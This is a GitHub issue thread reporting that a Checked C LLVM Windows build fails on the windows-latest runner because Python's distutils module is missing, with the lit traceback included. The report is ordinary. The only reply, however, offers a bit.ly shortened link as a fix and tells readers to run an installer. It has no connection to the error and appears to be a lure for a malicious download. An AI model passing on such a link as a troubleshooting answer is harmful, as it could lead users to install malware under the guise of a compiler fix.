### ISSUE TITLE
Windows build fails using the windows-latest GitHub runner.

### ISSUE THREAD

**Issue by dtarditi** [checkedc/workflows#3]
The Windows build fails using the windows-latest GitHub runner even when Python 3.9 is installed Windows-latest is Windows Server 2022.    Distutils is a Python package that was removed from later versions of Python.  It looks like it is gone in the windows-latest image for Python 3.9, even though it wasn't removed until Python 3.12.  From the logs:
```
llvm-lit.py: D:\a\workflows\workflows\checkedc-llvm-project\llvm\utils\lit\lit\llvm\config.py:42: note: using lit tools: C:\Program Files\Git\usr\bin
llvm-lit.py: D:\a\workflows\workflows\checkedc-llvm-project\llvm\utils\lit\lit\llvm\config.py:385: note: using clang: d:\a\workflows\workflows\b\llvm-release-amd64-windows.obj\bin\clang.exe
llvm-lit.py: D:\a\workflows\workflows\checkedc-llvm-project\llvm\utils\lit\lit\TestingConfig.py:100: fatal: unable to parse config file 'd:\\a\\workflows\\workflows\\b\\llvm-release-amd64-windows.obj\\tools\\clang\\test\\..\\..\\..\\..\\..\\checkedc-llvm-project\\clang\\test/lit.cfg.py', traceback: Traceback (most recent call last):
  File "D:\a\workflows\workflows\b\LLVM-Release-AMD64-Windows.obj\bin\..\..\..\checkedc-llvm-project\llvm\utils\lit\lit\TestingConfig.py", line 89, in load_from_path
    exec(compile(data, path, 'exec'), cfg_globals, None)
  File "d:\a\workflows\workflows\b\llvm-release-amd64-windows.obj\tools\clang\test\..\..\..\..\..\checkedc-llvm-project\clang\test/lit.cfg.py", line 116, in <module>
    if is_there("seahorn"):
       ^^^^^^^^^^^^^^^^^^^
  File "d:\a\workflows\workflows\b\llvm-release-amd64-windows.obj\tools\clang\test\..\..\..\..\..\checkedc-llvm-project\clang\test/lit.cfg.py", line 113, in is_there
    from distutils.spawn import find_executable
ModuleNotFoundError: No module named 'distutils'

[623/624] Running the Clang regression tests
FAILED: tools/clang/test/CMakeFiles/check-clang D:/a/workflows/workflows/b/LLVM-Release-AMD64-Windows.obj/tools/clang/test/CMakeFiles/check-clang

**Comment by 777Naity** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
